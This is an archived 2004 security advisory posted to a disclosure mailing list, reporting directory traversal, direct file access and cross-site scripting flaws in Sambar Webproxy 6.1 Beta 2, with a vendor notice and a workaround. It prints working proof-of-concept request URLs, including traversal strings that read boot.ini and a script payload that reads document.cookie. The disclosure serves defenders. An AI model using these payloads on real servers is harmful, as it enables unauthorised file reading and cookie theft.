| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <5452427$108608324940bc50b158cee8.36652122@config10.schlund.de>
From: oliver at greyhat.de (oliver@...yhat.de)
Subject: Sambar Proxy Multible Vulnerabilities
Sambar Proxy Multible Vulnerabilities
=====================================
I found some vulnerabilitites in Sambar Webproxy (www.sambar.com), which
allow the sambar admin access to files outside of the application
directories.
Since Sambar comes with no password for admin as default, it might be a
security problem, if administration of Sambar proxy is allowed from any
IP (by default it is restricted to 127.0.0.1!).
In Addition, i found some XSS.
Directory Traversal
===================
http://myserver/sysadmin/system/showini.asp?file=\..\..\..\..\..\..\..\boot.ini
See: www.oliverkarow.de/research/sambar_trav.GIF
Direct File Access
==================
http://localhost/sysadmin/system/showlog.asp?log=c:\boot.ini&tail=y
Cross Site Scripting
====================
http://localhost/sysadmin/system/show.asp?show=<script>alert("oops")</script>
http://localhost/sysadmin/system/showperf.asp?area=search&title=<script>alert(document.cookie)</script>
Version
=======
I only tested Sambar 6.1 Beta 2 on Windows platform (x86). Other
versions/platforms may also be affected.
Vendor
======
www.sambar.com
Vendor is informed, and is fixing this vulns in the next release.
Workaround
==========
Set a password for admin account and restrict administration to
localhost (default).
Credits
=======
15.05.2004 www.oliverkarow.de
www.oliverkarow.de/research/sambar.txt
Powered by blists - more mailing lists